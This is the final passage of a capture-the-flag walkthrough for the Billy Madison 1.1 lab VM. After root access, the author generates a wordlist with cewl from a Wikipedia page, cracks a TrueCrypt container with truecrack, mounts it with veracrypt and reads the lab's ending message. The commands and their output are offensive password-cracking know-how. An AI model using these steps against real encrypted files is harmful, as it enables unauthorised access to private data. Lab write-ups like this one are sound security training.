uid=0(root) gid=0(root) groups=0(root)
root@BM:/home/eric#

Great, now I am the root!!

Then found hint.txt and BowelMovement in folder /PRIVATE, downloaded these two files by using nc.

1
2
3
4
5
6
7
8
9
root@BM:/PRIVATE# cat hint.txt
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

From the link, I use cewl to generate a wordlist:

1
2
root@kali:/root/myTest/BillyMadison1.1# cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison
CeWL 5.3 (Heading Upwards) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Then using truecrack with wordlist to crack BowelMovement, the password is guessed successfully.

1
2
3
4
5
6
7
root@kali:~/myTest/BillyMadison1.1# truecrack -w billy-wiki.list -t BowelMovement
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password:       "execrable"
Password length:  "10"
Total computations:   "606"

Cool, then I downloaded and installed the tool veracrypt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~/myTest/BillyMadison1.1# mkdir billy-vera
root@kali:~/myTest/BillyMadison1.1# veracrypt -tc BowelMovement billy-vera

root@kali:~/myTest/BillyMadison1.1# cd billy-vera/
root@kali:~/myTest/BillyMadison1.1/billy-vera# ls
$RECYCLE.BIN  secret.zip
root@kali:~/myTest/BillyMadison1.1/billy-vera# unzip secret.zip
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc
  inflating: THE-END.txt
root@kali:~/myTest/BillyMadison1.1/billy-vera# ls
Billy_Madison_12th_Grade_Final_Project.doc  $RECYCLE.BIN  secret.zip  THE-END.txt
exit

root@kali:~/myTest/BillyMadison1.1/billy-vera# cat THE-END.txt
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Done.